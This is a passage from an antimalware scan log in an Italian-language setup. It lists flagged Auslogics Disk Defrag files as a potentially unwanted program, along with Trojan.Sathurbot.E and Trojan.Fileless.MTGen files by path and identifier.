PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Lang\fra.lng, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Lang\ita.lng, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Lang\jpn.lng, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Lang\rus.lng, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Setup\SetupCustom.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Auslogics\Disk Defrag\7.x\Data\giveaway.json, , [ef99effcedad57df0341e1cbba46c53b],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Auslogics\Disk Defrag\7.x\Data\giveaway.png, , [ef99effcedad57df0341e1cbba46c53b],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Auslogics\Disk Defrag\7.x\Reports\Disk_Defrag_Report.xml, , [ef99effcedad57df0341e1cbba46c53b],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Auslogics\Disk Defrag\7.x\Reports\Disk_Defrag_Report.xslt, , [ef99effcedad57df0341e1cbba46c53b],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics\Disk Defrag\Auslogics Disk Defrag sul Web.url, , [ff899d4e9ffb4ee821a607a5e41c46ba],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics\Disk Defrag\Auslogics Disk Defrag.lnk, , [ff899d4e9ffb4ee821a607a5e41c46ba],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics\Disk Defrag\Check Your PC Performance.url, , [ff899d4e9ffb4ee821a607a5e41c46ba],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\zepplauncher.mif, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp8F53.tmp, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB20F.tmp, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB682.tmp, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\{86789942-7BE6-B990-1774-8007D5A9E419}, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Fileless.MTGen, C:\Users\Tasca Pane\AppData\Local\30c530fa\5a6f2236.bat, , [1d6b2ac1e9b15adca6c2a0e8cf31926e],
Settori fisici: 0
(Nessun elemento nocivo rilevato)
(end)
GRAZIE